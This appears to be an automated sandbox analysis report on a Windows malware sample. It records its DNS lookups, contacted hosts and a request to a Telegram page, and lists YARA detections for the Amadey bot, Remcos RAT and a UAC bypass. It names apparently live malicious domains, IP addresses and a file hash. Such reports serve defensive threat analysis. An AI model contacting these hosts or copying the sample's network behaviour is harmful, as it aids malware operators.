                                                                                              Sep 28, 2023 06:05:43.819346905 CEST192.168.2.38.8.8.80xade8Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:45.457916975 CEST192.168.2.38.8.8.80x49eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:47.018054008 CEST192.168.2.38.8.8.80xd16dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:48.643064976 CEST192.168.2.38.8.8.80xacc6Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:50.238380909 CEST192.168.2.38.8.8.80x8dfdStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:51.954399109 CEST192.168.2.38.8.8.80x16fdStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:53.518309116 CEST192.168.2.38.8.8.80xf4ddStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:55.141902924 CEST192.168.2.38.8.8.80xf582Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Sep 28, 2023 06:01:52.268106937 CEST8.8.8.8192.168.2.30x6e27No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:52.632922888 CEST8.8.8.8192.168.2.30x46abNo error (0)transdi.org157.90.36.211A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:54.425152063 CEST8.8.8.8192.168.2.30xe929No error (0)pixcode.com.mx192.185.131.188A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:56.243161917 CEST8.8.8.8192.168.2.30xca3bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:57.178205967 CEST8.8.8.8192.168.2.30x1f55No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:57.453468084 CEST8.8.8.8192.168.2.30x994bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:01.009546041 CEST8.8.8.8192.168.2.30x6dd5No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:05.833375931 CEST8.8.8.8192.168.2.30x3651No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:07.137016058 CEST8.8.8.8192.168.2.30x3651No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:08.667557001 CEST8.8.8.8192.168.2.30x8bfbNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:11.278811932 CEST8.8.8.8192.168.2.30x3694No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:16.035126925 CEST8.8.8.8192.168.2.30x3528No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:17.720834017 CEST8.8.8.8192.168.2.30x3528No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:18.638284922 CEST8.8.8.8192.168.2.30xfcafNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:21.256705999 CEST8.8.8.8192.168.2.30x7ac0No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:25.014231920 CEST8.8.8.8192.168.2.30xe04aNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:28.759562969 CEST8.8.8.8192.168.2.30x4b09No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:31.372854948 CEST8.8.8.8192.168.2.30xb189No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:34.003343105 CEST8.8.8.8192.168.2.30x6c84No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:36.630558968 CEST8.8.8.8192.168.2.30xe732No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:39.251857042 CEST8.8.8.8192.168.2.30x47caNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:42.025074959 CEST8.8.8.8192.168.2.30x18a7No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:44.651746988 CEST8.8.8.8192.168.2.30x28d8No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:47.293508053 CEST8.8.8.8192.168.2.30xb5acNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:49.923060894 CEST8.8.8.8192.168.2.30x2e35No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:52.559290886 CEST8.8.8.8192.168.2.30xf82bNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:55.183496952 CEST8.8.8.8192.168.2.30x3285No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:57.852036953 CEST8.8.8.8192.168.2.30xa25dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:59.339616060 CEST8.8.8.8192.168.2.30x6f37No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:00.826630116 CEST8.8.8.8192.168.2.30x195bNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:02.358766079 CEST8.8.8.8192.168.2.30xff6No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:03.864959955 CEST8.8.8.8192.168.2.30xc405No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:05.352438927 CEST8.8.8.8192.168.2.30x5a02No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:06.819865942 CEST8.8.8.8192.168.2.30x2970No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:10.331697941 CEST8.8.8.8192.168.2.30xf89No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:10.790951014 CEST8.8.8.8192.168.2.30xf89No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:11.391381979 CEST8.8.8.8192.168.2.30xf89No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:11.824497938 CEST8.8.8.8192.168.2.30x4c23No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:13.307112932 CEST8.8.8.8192.168.2.30x283eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:14.777721882 CEST8.8.8.8192.168.2.30xc869No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:16.368856907 CEST8.8.8.8192.168.2.30xe632No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:17.868592024 CEST8.8.8.8192.168.2.30x14e9No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:19.504087925 CEST8.8.8.8192.168.2.30xbc07No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:21.054369926 CEST8.8.8.8192.168.2.30xa0e4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:22.601128101 CEST8.8.8.8192.168.2.30x55acNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:24.101625919 CEST8.8.8.8192.168.2.30xd80eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:25.665723085 CEST8.8.8.8192.168.2.30xb566No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:27.167010069 CEST8.8.8.8192.168.2.30xbdd2No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:28.807364941 CEST8.8.8.8192.168.2.30x8e36No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:30.309215069 CEST8.8.8.8192.168.2.30xeca0No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:31.867543936 CEST8.8.8.8192.168.2.30xbdb4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:33.493050098 CEST8.8.8.8192.168.2.30x5060No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:35.167251110 CEST8.8.8.8192.168.2.30xca41No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:36.664720058 CEST8.8.8.8192.168.2.30xad8cNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:38.320497990 CEST8.8.8.8192.168.2.30xeb06No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:39.959136009 CEST8.8.8.8192.168.2.30x33d2No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:41.491180897 CEST8.8.8.8192.168.2.30x3797No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:43.104634047 CEST8.8.8.8192.168.2.30x7ac3No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:44.803764105 CEST8.8.8.8192.168.2.30x8c28No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:46.309901953 CEST8.8.8.8192.168.2.30xa8abNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:47.872764111 CEST8.8.8.8192.168.2.30x5507No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:49.492672920 CEST8.8.8.8192.168.2.30x9770No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:51.057986021 CEST8.8.8.8192.168.2.30x4b70No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:52.601519108 CEST8.8.8.8192.168.2.30xe8d1No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:54.106312990 CEST8.8.8.8192.168.2.30xc646No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:55.664120913 CEST8.8.8.8192.168.2.30x95c6No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:57.304140091 CEST8.8.8.8192.168.2.30x814eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:58.891202927 CEST8.8.8.8192.168.2.30xd1ecNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:00.554404020 CEST8.8.8.8192.168.2.30xbadeNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:01.024743080 CEST8.8.8.8192.168.2.30xf42aNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:03.562879086 CEST8.8.8.8192.168.2.30xe795No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:04.554912090 CEST8.8.8.8192.168.2.30xe795No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:05.102572918 CEST8.8.8.8192.168.2.30x38c1No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:06.598918915 CEST8.8.8.8192.168.2.30xeca4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:08.159667969 CEST8.8.8.8192.168.2.30x6d9eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:09.803488016 CEST8.8.8.8192.168.2.30x60c4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:11.302782059 CEST8.8.8.8192.168.2.30xe8a7No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:12.802385092 CEST8.8.8.8192.168.2.30xd100No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:14.369601011 CEST8.8.8.8192.168.2.30xea24No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:16.172080994 CEST8.8.8.8192.168.2.30xa2ceNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:17.665863991 CEST8.8.8.8192.168.2.30xb152No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:19.163638115 CEST8.8.8.8192.168.2.30xe4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:20.806746006 CEST8.8.8.8192.168.2.30xb6b4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:22.365608931 CEST8.8.8.8192.168.2.30x4056No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:23.991184950 CEST8.8.8.8192.168.2.30x1642No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:25.490632057 CEST8.8.8.8192.168.2.30xeb72No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:27.061511040 CEST8.8.8.8192.168.2.30x9741No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:28.554563046 CEST8.8.8.8192.168.2.30x9c89No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:30.098606110 CEST8.8.8.8192.168.2.30xbb27No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:31.614036083 CEST8.8.8.8192.168.2.30xd89aNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:33.164001942 CEST8.8.8.8192.168.2.30xe57bNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:34.803116083 CEST8.8.8.8192.168.2.30x9559No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:36.365201950 CEST8.8.8.8192.168.2.30xd816No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:37.867058992 CEST8.8.8.8192.168.2.30xdc8dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:39.493412971 CEST8.8.8.8192.168.2.30x22No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:41.055499077 CEST8.8.8.8192.168.2.30x891bNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:42.599716902 CEST8.8.8.8192.168.2.30x2a91No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:44.100550890 CEST8.8.8.8192.168.2.30xad56No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:45.869626999 CEST8.8.8.8192.168.2.30x6a6dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:47.365052938 CEST8.8.8.8192.168.2.30x7526No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:47.832494974 CEST8.8.8.8192.168.2.30x9217No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:49.365827084 CEST8.8.8.8192.168.2.30x79c4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:50.993376017 CEST8.8.8.8192.168.2.30x787fNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:52.555506945 CEST8.8.8.8192.168.2.30xf51No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:54.101025105 CEST8.8.8.8192.168.2.30x480cNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:55.597212076 CEST8.8.8.8192.168.2.30xb5dfNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:57.170309067 CEST8.8.8.8192.168.2.30x2f16No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:58.803096056 CEST8.8.8.8192.168.2.30x87e4No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:00.304912090 CEST8.8.8.8192.168.2.30xfde1No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:01.806849003 CEST8.8.8.8192.168.2.30x4c43No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:03.364871979 CEST8.8.8.8192.168.2.30x4ca1No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:04.990542889 CEST8.8.8.8192.168.2.30xcb73No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:06.551423073 CEST8.8.8.8192.168.2.30x67e3No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:08.055949926 CEST8.8.8.8192.168.2.30xa668No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:09.599150896 CEST8.8.8.8192.168.2.30xe66bNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:11.099834919 CEST8.8.8.8192.168.2.30x6827No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:12.601188898 CEST8.8.8.8192.168.2.30x9d40No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:14.161282063 CEST8.8.8.8192.168.2.30xdf91No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:15.661519051 CEST8.8.8.8192.168.2.30x4928No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:17.301650047 CEST8.8.8.8192.168.2.30x537dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:18.871089935 CEST8.8.8.8192.168.2.30xbf6aNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:20.493690968 CEST8.8.8.8192.168.2.30x8d47No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:22.053153038 CEST8.8.8.8192.168.2.30xcb1eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:23.799484968 CEST8.8.8.8192.168.2.30x1a92No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:25.307146072 CEST8.8.8.8192.168.2.30x8dc2No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:26.873087883 CEST8.8.8.8192.168.2.30xd8cfNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:28.365129948 CEST8.8.8.8192.168.2.30xeaNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:29.989506006 CEST8.8.8.8192.168.2.30xe658No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:31.491724014 CEST8.8.8.8192.168.2.30x929No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:33.054698944 CEST8.8.8.8192.168.2.30x7a83No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:34.752890110 CEST8.8.8.8192.168.2.30x45eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:36.372513056 CEST8.8.8.8192.168.2.30x3593No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:37.993813992 CEST8.8.8.8192.168.2.30x7315No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:39.552588940 CEST8.8.8.8192.168.2.30x1b5dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:41.101784945 CEST8.8.8.8192.168.2.30xcfb1No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:42.601962090 CEST8.8.8.8192.168.2.30xbca7No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:44.168281078 CEST8.8.8.8192.168.2.30xade8No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:45.807625055 CEST8.8.8.8192.168.2.30x49eNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:47.364371061 CEST8.8.8.8192.168.2.30xd16dNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:48.992279053 CEST8.8.8.8192.168.2.30xacc6No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:50.584646940 CEST8.8.8.8192.168.2.30x8dfdNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:52.304850101 CEST8.8.8.8192.168.2.30x16fdNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:53.867084026 CEST8.8.8.8192.168.2.30xf4ddNo error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:55.486463070 CEST8.8.8.8192.168.2.30xf582No error (0)mardukoff.info127.0.0.127A (IP address)IN (0x0001)false
                                                                                              • t.me
                                                                                              • 95.141.41.12
                                                                                              • transdi.org
                                                                                              • pixcode.com.mx
                                                                                              • geoplugin.net
                                                                                              • 116.202.2.169:1333
                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.349808149.154.167.99443C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-09-28 04:01:57 UTC0OUTGET /solonichat HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                                                                              Host: t.me
                                                                                              2023-09-28 04:01:58 UTC0INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Thu, 28 Sep 2023 04:01:58 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 12384
                                                                                              Connection: close
                                                                                              Set-Cookie: stel_ssid=7ea636a9d50f78b63a_16011379437204589503; expires=Fri, 29 Sep 2023 04:01:58 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                              Pragma: no-cache
                                                                                              Cache-control: no-store
                                                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                              Strict-Transport-Security: max-age=35768000
                                                                                              2023-09-28 04:01:58 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 73 6f 6c 6f 6e 69 63 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @solonichat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:06:01:50
                                                                                              Start date:28/09/2023
                                                                                              Path:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              Imagebase:0xcb0000
                                                                                              File size:224'256 bytes
                                                                                              MD5 hash:B2EE13E6988E57F6731C20DA3459C8DC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
